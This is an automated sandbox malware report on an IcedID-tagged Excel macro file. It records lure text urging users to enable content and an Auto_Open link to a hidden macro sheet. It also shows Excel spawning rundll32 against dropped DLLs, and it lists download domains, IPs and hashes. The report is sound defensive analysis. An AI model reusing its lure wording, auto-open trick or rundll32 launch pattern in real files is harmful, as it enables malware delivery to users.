Analysis Report statistic-2070252624.xlsm

Overview

General Information

Sample Name: statistic-2070252624.xlsm
Analysis ID: 403877
MD5: 0fbdc8a2acd4dc782821cfa4fdf75099
SHA1: e407df0a3a3ceed4c3e9aed5716974a45cd5c542
SHA256: abd13b66e40db6ad8a4489667c1a1d58fde38e7388970bfbc4d8c7b3fb6cb04e
Tags: IcedID, xlsm

Detection

Hidden Macro 4.0
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: System File Execution Location Anomaly
Yara detected MalDoc1
Allocates a big amount of memory (probably used for heap spraying)
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6868 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 7160 cmdline: rundll32 ..\jordji.nbvt1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5688 cmdline: rundll32 ..\jordji.nbvt11,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
sharedStrings.xml | JoeSecurity_MalDoc_1 | Yara detected MalDoc_1 | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6868, ProcessCommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, ProcessId: 7160
Sigma detected: System File Execution Location Anomaly
Source: Process started; Author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community; Data: Command: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6868, ProcessCommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, ProcessId: 7160

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: statistic-2070252624.xlsm; ReversingLabs: Detection: 57%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown; HTTPS traffic detected: 192.254.233.89:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 192.185.5.2:443 -> 192.168.2.4:49735 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process created: C:\Windows\SysWOW64\rundll32.exe
Source: excel.exe; Memory has grown: Private usage: 1MB later: 179MB
Source: global traffic; DNS query: name: industrialarttextile.com
Source: global traffic; TCP traffic: 192.168.2.4:49733 -> 192.254.233.89:443

Networking:

Yara detected MalDoc1
Source: Yara match; File source: sharedStrings.xml, type: SAMPLE
Source: Joe Sandbox View; IP Address: 192.185.5.2
Source: Joe Sandbox View; IP Address: 192.254.233.89
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown; DNS traffic detected: queries for: industrialarttextile.com
Source: jordji.nbvt11.0.dr; String found in binary or memory: http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4
Source: unknown; Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown; Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown; Network traffic detected: HTTP traffic on port 49737 -> 443

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4; Screenshot OCR: Enable Editing from the yellow bar above RunDLL X Once You have Enable Editing ,please clic! f
Source: Screenshot number: 8; Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Cont
Source: Screenshot number: 8; Screenshot OCR: Enable Content from the yellow bar above / , WHY I CANNOT OPEN THIS DOCUMENT? W You are using i
Source: Screenshot number: 12; Screenshot OCR: Enable Editing I from the yellow bar above Once You have Enable Editing , please click Enable Co
Source: Screenshot number: 12; Screenshot OCR: Enable Content i from the yellow bar above ' I C' WHY I CANNOT OPEN THIS DOCUMENT? I i I W You
Source: Document image extraction number: 7; Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 7; Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 17; Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Document image extraction number: 17; Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
Found Excel 4.0 Macro with suspicious formulas
Source: statistic-2070252624.xlsm; Initial sample: EXEC
Source: statistic-2070252624.xlsm; Initial sample: CALL
Found abnormal large hidden Excel 4.0 Macro sheet
Source: statistic-2070252624.xlsm; Initial sample: Sheet size: 22188
Source: workbook.xml; Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="5" lowestEdited="6" rupBuild="9303"/><workbookPr filterPrivacy="1"/><bookViews><workbookView xWindow="8595" yWindow="0" windowWidth="4020" windowHeight="3120"/></bookViews><sheets><sheet name="Sheet1" sheetId="9" r:id="rId1"/><sheet name="Sheet2" sheetId="4" r:id="rId2"/><sheet name="Sheet3" sheetId="7" r:id="rId3"/><sheet name="Sheet4" sheetId="8" r:id="rId4"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet2!$AO$115</definedName></definedNames><calcPr calcId="145621"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
Source: classification engine; Classification label: mal84.troj.expl.evad.winXLSM@5/14@2/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\{BE9A5C30-A797-41B8-976C-ECAF1DAC178D} - OProcSessId.dat
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
Source: unknown; Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt11,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe; Automated click: OK
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: statistic-2070252624.xlsm; Initial sample: OLE zip file path = xl/media/image4.png
Source: statistic-2070252624.xlsm; Initial sample: OLE zip file path = xl/media/image2.png
Source: statistic-2070252624.xlsm; Initial sample: OLE zip file path = xl/media/image1.png
Source: statistic-2070252624.xlsm; Initial sample: OLE zip file path = xl/media/image3.png
Source: statistic-2070252624.xlsm; Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: statistic-2070252624.xlsm; Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: rundll32.exe, 00000001.00000002.693486346.0000000003120000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.687030011.0000000002AD0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: rundll32.exe, 00000001.00000002.693486346.0000000003120000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.687030011.0000000002AD0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: rundll32.exe, 00000001.00000002.693486346.0000000003120000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.687030011.0000000002AD0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: rundll32.exe, 00000001.00000002.693486346.0000000003120000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.687030011.0000000002AD0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    Mitre Att&ck Matrix

    Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
    Execution: Scripting (2, 1), Exploitation for Client Execution (2, 3), At (Linux), At (Windows), Cron, Launchd
    Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
    Privilege Escalation: Process Injection (1), Extra Window Memory Injection (1), Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
    Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Rundll32 (1), Process Injection (1), Scripting (2, 1), Extra Window Memory Injection (1)
    Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
    Discovery: Security Software Discovery (1), File and Directory Discovery (1), System Information Discovery (2), System Network Configuration Discovery, Remote System Discovery, System Owner/User Discovery
    Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
    Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
    Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
    Command and Control: Encrypted Channel (2), Non-Application Layer Protocol (1), Application Layer Protocol (2), Protocol Impersonation, Fallback Channels, Multiband Communication
    Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service
    Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
    Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features

    Behavior Graph

    Screenshots

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source: statistic-2070252624.xlsm; Detection: 6%; Scanner: Virustotal
    Source: statistic-2070252624.xlsm; Detection: 57%; Scanner: ReversingLabs; Label: Document-Office.Downloader.EncDoc

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    Source: anaheimdermatologists.com; Detection: 3%; Scanner: Virustotal
    Source: industrialarttextile.com; Detection: 0%; Scanner: Virustotal

    URLs


    Domains and IPs

    Contacted Domains

    anaheimdermatologists.com; IP: 192.185.5.2; Active: true; Malicious: false; Reputation: unknown
    industrialarttextile.com; IP: 192.254.233.89; Active: true; Malicious: false; Reputation: unknown

    URLs from Memory and Binaries

                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                      high
                                                                                      https://management.azure.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                        high
                                                                                        https://wus2.contentsync.D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://incidents.diagnostics.office.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/iosD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                            high
                                                                                            http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4jordji.nbvt11.0.drfalse
                                                                                              high
                                                                                              https://insertmedia.bing.office.net/odc/insertmediaD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                high
                                                                                                https://o365auditrealtimeingestion.manage.office.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                  high
                                                                                                  https://outlook.office365.com/api/v1.0/me/ActivitiesD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                    high
                                                                                                    https://api.office.netD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                      high
                                                                                                      https://incidents.diagnosticssdf.office.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                        high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                        • 0%, Virustotal, Browse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policiesD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                          high
                                                                                                          https://entitlement.diagnostics.office.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                            high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                              high
                                                                                                              https://outlook.office.com/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                high
                                                                                                                https://storage.live.com/clientlogs/uploadlocationD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                  high
                                                                                                                  https://templatelogging.office.com/client/logD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office365.com/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                      high
                                                                                                                      https://webshell.suite.office.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                        high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                          high
                                                                                                                          https://management.azure.com/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                            high
                                                                                                                            https://login.windows.net/common/oauth2/authorizeD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                              high
                                                                                                                              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://graph.windows.net/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                high
                                                                                                                                https://api.powerbi.com/beta/myorg/importsD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://devnull.onenote.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://ncus.pagecontentsync.D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://messaging.office.com/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://augloop.office.com/v2D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://skyapi.live.net/Activity/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/macD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://dataservice.o365filtering.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://api.cortana.aiD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://onedrive.live.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://ovisualuiapp.azurewebsites.net/pbiagave/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                                  • 0%, Virustotal, Browse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://visio.uservoice.com/forums/368202-visio-on-devicesD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://directory.services.D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://login.windows-ppe.net/common/oauth2/authorizeD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                                      high

Contacted IPs

Public

IP              Domain                      Country        ASN    ASN Name             Malicious
192.185.5.2     anaheimdermatologists.com   United States  46606  UNIFIEDLAYER-AS-1US  false
192.254.233.89  industrialarttextile.com    United States  46606  UNIFIEDLAYER-AS-1US  false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 403877
Start date: 04.05.2021
Start time: 13:47:15
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 34s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: statistic-2070252624.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal84.troj.expl.evad.winXLSM@5/14@2/2
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match        Associated Sample Name / URL   SHA 256   Detection   Link    Context
192.185.5.2  statistic-2069354685.xlsm      Get hash  malicious   Browse
             statistic-2070252624.xlsm      Get hash  malicious   Browse
             statistic-2072807337.xlsm      Get hash  malicious   Browse
             statistic-207394368.xlsm       Get hash  malicious   Browse
             statistic-2072807337.xlsm      Get hash  malicious   Browse
             statistic-207394368.xlsm       Get hash  malicious   Browse
             catalog-1521295750.xlsm        Get hash  malicious   Browse
             catalog-1521295750.xlsm        Get hash  malicious   Browse
             statistic-1048881972.xlsm      Get hash  malicious   Browse
             statistic-1048881972.xlsm      Get hash  malicious   Browse
             f.xlsm                         Get hash  malicious   Browse
                                                                                                                                                                            f.xlsmGet hashmaliciousBrowse
                                                                                                                                                                              statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                    14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      diagram-1732659868.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        diagram-1732659868.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          diagram-1732659868.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                            diagram-1732659868.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                              192.254.233.89statistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                  statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                      statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                          statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                            statistic-1048881972.xlsmGet hashmaliciousBrowse
